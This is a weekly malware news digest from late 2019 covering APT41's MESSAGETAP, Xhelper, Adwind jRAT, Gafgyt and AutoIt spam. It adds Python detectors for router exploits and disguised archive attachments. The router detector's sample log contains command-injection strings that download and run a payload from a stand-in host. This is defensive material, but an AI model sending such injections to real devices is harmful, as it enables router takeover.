Malware Watch - W/E - 11/1/19
Chinese Spies Deploy MESSAGETAP Malware for Financially Motivated Intrusions (10/30/2019)
A new malware family dubbed "MESSAGETAP" monitors SMS traffic and saves messages that match a predefined list of phone numbers, IMSI numbers, and keywords. FireEye researchers said the tool was deployed by the China-based APT41 threat actor (a group FireEye tracks as conducting both state-sponsored espionage and financially motivated operations) inside a telecommunications network provider in support of Chinese espionage efforts. MESSAGETAP is a 64-bit ELF data miner that is initially loaded by an installation script; it is highly targeted, as it ships with the pre-defined list of phone and IMSI numbers. Once a server is infected, any SMS message whose phone number or IMSI number matches the list, or whose content contains a listed keyword, is written to a CSV file for later retrieval by the threat actor.
Malicious Xhelper App Infects More than 45,000 Devices (10/29/2019)
Symantec has observed a surge in detections of the malicious Xhelper app, which hides itself from users, downloads additional malicious apps, and displays advertisements. The Android app is persistent: it reinstalls itself after users uninstall it and stays hidden by not appearing in the system launcher. The app has infected over 45,000 devices within a six-month period, mainly in India, Russia, and the US.
New Variant of Adwind jRAT Takes Aim at Windows, Chromium Browsers (10/29/2019)
Menlo Security researchers discovered a new variant of Adwind jRAT, a Java-based remote access Trojan that takes control of a user's machine and collects data from it, namely login credentials. The variant targets Windows machines and common Windows applications such as Internet Explorer and Outlook, as well as Chromium-based browsers, including Brave. The malware is delivered as a JAR file, either via a link in a phishing email or as a download from a legitimate site serving insecure third-party content; many infections traced back to outdated or compromised WordPress sites.
SOHO Routers Abused by Gafgyt Botnet to Attack Gaming Servers (10/31/2019)
A new variant of the Gafgyt botnet malware has been infecting small office/home office (SOHO) wireless routers from commercial brands including Zyxel and Huawei, as well as devices built on Realtek chipsets, competing with JenX and similar botnets for the same hosts. According to Palo Alto Networks' Unit 42, more than 32,000 WiFi routers are potentially vulnerable. The variant exploits three known, long-patched vulnerabilities: a remote command injection in the Zyxel P660HN-T1A (CVE-2017-18368), a remote code execution (RCE) flaw in Huawei's HG532 (CVE-2017-17215), and an RCE in the UPnP service of the Realtek RTL81XX SDK (CVE-2014-8361). Once infected, the routers are used to launch denial-of-service floods against gaming servers, specifically ones that abuse Valve's Source Engine protocol; some operators also aim at servers hosting popular games such as Fortnite.
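All three router flaws are exploited the same way: an unauthenticated POST to a fixed management or UPnP endpoint whose parameter value smuggles a shell command. That makes them easy to spot in web or proxy logs from the device side. The Python below is an added example, not code from the original digest or from Unit 42; the endpoint paths and parameter names are the commonly documented ones for these CVEs, while the tab-separated log format and the sample lines are constructed for this example.

```python
import re
from typing import Optional

# Request shapes for the three router flaws named in the item above.
# Paths and parameter names are the commonly documented ones; the CVE
# identifiers are added here and do not appear in the original digest.
SIGNATURES = [
    (
        "CVE-2017-18368 Zyxel P660HN-T1A remote command injection",
        re.compile(r"^/cgi-bin/ViewLog\.asp$"),
        # remote_host value followed by a shell separator or substitution
        re.compile(r"remote_host=[^&]*[;|`$]"),
    ),
    (
        "CVE-2017-17215 Huawei HG532 RCE",
        re.compile(r"^/ctrlt/DeviceUpgrade_1$"),
        re.compile(r"<NewStatusURL>[^<]*\$\("),
    ),
    (
        "CVE-2014-8361 Realtek SDK miniigd UPnP RCE",
        re.compile(r"^/(picsdesc|wanipcn)\.xml$"),
        re.compile(r"<NewInternalClient>[^<]*[;|`$]"),
    ),
]


def classify_request(method: str, path: str, body: str) -> Optional[str]:
    """Return the matching exploit name, or None for a benign request.

    A request to the same endpoint with a clean parameter value (e.g. a
    legitimate remote_host IP) is not flagged: both the path and the
    injected shell metacharacter must be present.
    """
    if method.upper() != "POST":
        return None
    for name, path_re, body_re in SIGNATURES:
        if path_re.search(path) and body_re.search(body):
            return name
    return None


def scan_log(lines):
    """Scan constructed log lines of the form src_ip<TAB>method<TAB>path<TAB>body."""
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split("\t", 3)
        if len(parts) != 4:
            continue  # malformed line: skip rather than guess at fields
        src, method, path, body = parts
        name = classify_request(method, path, body)
        if name:
            hits.append((src, name))
    return hits


# Constructed sample traffic for this example (not real captures).
SAMPLE_LOG = [
    "203.0.113.7\tPOST\t/cgi-bin/ViewLog.asp\tremote_host=;cd /tmp;wget http://198.51.100.9/x;sh x",
    "203.0.113.8\tPOST\t/ctrlt/DeviceUpgrade_1\t<NewStatusURL>$(/bin/busybox wget -g 198.51.100.9 -l /tmp/a -r /a)</NewStatusURL>",
    "203.0.113.9\tPOST\t/picsdesc.xml\t<NewInternalClient>`cd /tmp;wget http://198.51.100.9/r`</NewInternalClient>",
    "192.0.2.5\tPOST\t/cgi-bin/ViewLog.asp\tremote_host=192.0.2.50",  # legitimate use of the form
    "192.0.2.6\tGET\t/picsdesc.xml\t",  # plain UPnP description fetch, benign
]

if __name__ == "__main__":
    for src, name in scan_log(SAMPLE_LOG):
        print(f"{src}: {name}")
```

Running it on the sample prints one hit per attacking source and nothing for the two benign lines. The practical point is the pairing of endpoint and metacharacter: alerting on the path alone would page on every legitimate log view or UPnP discovery, while alerting on `;` or `$(` anywhere in a body would drown in noise.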
Spam Campaign Drops Dangerous AutoIT-Compiled Payloads (10/29/2019)
Trend Micro spotted a spam campaign delivering AutoIt-compiled payloads, including the Trojan spy Agent Tesla and the remote access Trojan Ave Maria (also known as Warzone). To evade detection, the campaign wraps the AutoIt-obfuscated payloads in ISO image files as well as RAR- and LZH-compressed archive attachments; ISO images in particular can slip past spam filters that do not inspect disk-image containers. The vendor observed the spam being sent from a possibly compromised webmail account.
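A filter that keys only on the attachment's extension misses exactly this trick, since an ISO or archive can be renamed to anything. The Python below is an added example, not code from the original digest or from Trend Micro: it identifies ISO 9660, RAR and LZH attachments by their standard magic bytes, reports an extension/content mismatch, and runs against a message constructed inline for the example (the sender and recipient addresses and the attachment contents are made up).

```python
import email
from email import policy
from email.message import EmailMessage
from typing import List, Optional, Tuple

# Extensions the item above names as abused containers (plus LZH's .lha alias).
CONTAINER_EXTENSIONS = {".iso", ".rar", ".lzh", ".lha"}


def sniff_container(data: bytes) -> Optional[str]:
    """Identify ISO 9660, RAR (v4/v5) or LZH by magic bytes, ignoring the filename."""
    # ISO 9660: the primary volume descriptor at offset 0x8000 begins 0x01 "CD001".
    if len(data) >= 0x8006 and data[0x8000:0x8006] == b"\x01CD001":
        return "iso"
    # RAR 4.x: "Rar!\x1a\x07\x00"; RAR 5: "Rar!\x1a\x07\x01\x00".
    if data.startswith(b"Rar!\x1a\x07\x00") or data.startswith(b"Rar!\x1a\x07\x01\x00"):
        return "rar"
    # LZH/LHA: method id "-lXX-" (e.g. "-lh5-") at bytes 2..6 of the first header.
    if len(data) >= 7 and data[2:3] == b"-" and data[3:4] == b"l" and data[6:7] == b"-":
        return "lzh"
    return None


def flagged_attachments(raw_message: bytes) -> List[Tuple[str, str]]:
    """Return (filename, reason) for attachments that are archive/disk-image containers.

    Both the declared extension and the real content are checked, so a renamed
    ISO such as "invoice.pdf" is still caught and the mismatch is reported.
    """
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
        payload = part.get_content()
        if isinstance(payload, str):  # text/* parts decode to str; sniff their bytes anyway
            payload = payload.encode(part.get_content_charset() or "utf-8", "replace")
        kind = sniff_container(payload)
        if kind and ext not in CONTAINER_EXTENSIONS:
            findings.append((name, f"content is {kind} but extension is '{ext or 'none'}'"))
        elif kind:
            findings.append((name, f"{kind} container attachment"))
        elif ext in CONTAINER_EXTENSIONS:
            findings.append((name, f"declared {ext} container (magic not recognised)"))
    return findings


def build_sample_message() -> bytes:
    """Construct a message with a renamed ISO, a RAR5 header stub and a benign text file."""
    msg = EmailMessage()
    msg["From"] = "sender@example.test"
    msg["To"] = "victim@example.test"
    msg["Subject"] = "Invoice"
    msg.set_content("Please find the invoice attached.")
    # Minimal ISO 9660 layout: 32 KiB system area, then the PVD signature.
    fake_iso = b"\x00" * 0x8000 + b"\x01CD001\x01\x00" + b"\x00" * 64
    msg.add_attachment(fake_iso, maintype="application", subtype="pdf", filename="invoice.pdf")
    rar_stub = b"Rar!\x1a\x07\x01\x00" + b"\x00" * 32  # RAR5 signature only
    msg.add_attachment(rar_stub, maintype="application", subtype="octet-stream", filename="scan.rar")
    msg.add_attachment("just text", subtype="plain", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reason in flagged_attachments(build_sample_message()):
        print(f"{name}: {reason}")
```

On the constructed message this flags `invoice.pdf` as an ISO with a mismatched extension and `scan.rar` as a declared archive, and leaves `notes.txt` alone. In a real gateway the next step is to open the container and apply the same checks recursively to what is inside it, since the AutoIt-compiled executable is what ultimately runs.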